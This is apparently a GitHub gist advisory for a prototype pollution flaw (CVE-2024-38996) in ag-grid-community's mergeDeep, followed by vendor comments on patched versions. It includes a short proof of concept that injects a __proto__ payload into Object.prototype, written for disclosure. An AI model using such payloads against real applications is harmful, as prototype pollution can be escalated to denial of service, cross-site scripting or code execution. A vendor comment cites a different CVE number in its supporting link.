@mestrtee
Last active September 5, 2024 08:33
[CVE-2024-38996] Vulnerability Advisory: Prototype Pollution in ag-grid-community, version 31.3.2

Vulnerability type: Prototype Pollution

CVSS Score: 9.8 CRITICAL

Vendor of the Package: ag-grid

Affected Package:

  • Product: ag-grid-community
  • Version: 31.3.2

Affected component(s):

_.mergeDeep

Attack vector(s): an attacker who controls an argument to the vulnerable function _.mergeDeep can pass an object carrying the special property __proto__; the merge writes through that property into the built-in Object.prototype, polluting application logic in a way that can be escalated to denial of service, remote code execution or cross-site scripting attacks.

Description: Affected versions of this package are vulnerable to Prototype Pollution through the vulnerable function _.mergeDeep. An attacker can alter the behavior of all objects inheriting from the affected prototype by passing arguments to the vulnerable function that are crafted with the built-in property __proto__. The attack can potentially be escalated to denial of service, remote code execution or cross-site scripting attacks, depending on the gadgets that are reachable in the affected application.

Proof-of-Concept:

(async () => {
  const lib = await import('ag-grid-community');

  // A fresh object that inherits from Object.prototype; used only to observe the pollution.
  const victim = {};

  console.log("Before Attack: ", JSON.stringify(victim.__proto__));

  try {
    // The crafted argument carries an own "__proto__" key, which mergeDeep walks into.
    lib._.mergeDeep({}, JSON.parse('{"__proto__":{"test":123}}'));
  } catch (e) { }

  // If the merge polluted Object.prototype, "test" now appears on victim's prototype.
  console.log("After Attack: ", JSON.stringify(victim.__proto__));

  // Clean up so the polluted property does not persist in the process.
  delete Object.prototype.test;
})();
@AG-Zoheil

Please note this has been addressed and resolved via patch 31.3.4 for version 31 and patch 32.0.2 for version 32.

@Otr92

Otr92 commented Jul 17, 2024

Hi @AG-Zoheil,

Are previous versions, including the 20.2.0 version which I'm using for both ag-grid-community and ag-grid-enterprise, also vulnerable?

Thanks,

@AG-Zoheil

We are not in a position to do a comprehensive investigation into which earlier versions of AG Grid are affected, however we can now confirm that our findings are in line with the EPSS rating of the vulnerability that stands at just 0.05% (independently verified here: https://www.cvedetails.com/cve/CVE-2024-39001/), meaning this vulnerability is extremely unlikely to be exploited.

We have provided patches for our latest version (v32) and the version it was reported in (v31).

As usual, we'd recommend upgrading the version of AG Grid in your application so you can benefit from all the improvements in functionality, stability, security, theming and performance we've made since the version you're using.

@vigneshnithyanandan

Hi @AG-Zoheil,

Does this vulnerability exist in all prior versions of ag-grid-community? The latest update in the advisory database, github/advisory-database@c2bcebe, says all versions of ag-grid-community up until 31.3.4 are affected.

@AG-Zoheil

Hi @vigneshnithyanandan,

Please read my comment above regarding older versions of AG Grid.

We have provided patches for our latest version (v32) and the version it was reported in (v31) and we'd recommend upgrading to either of them.
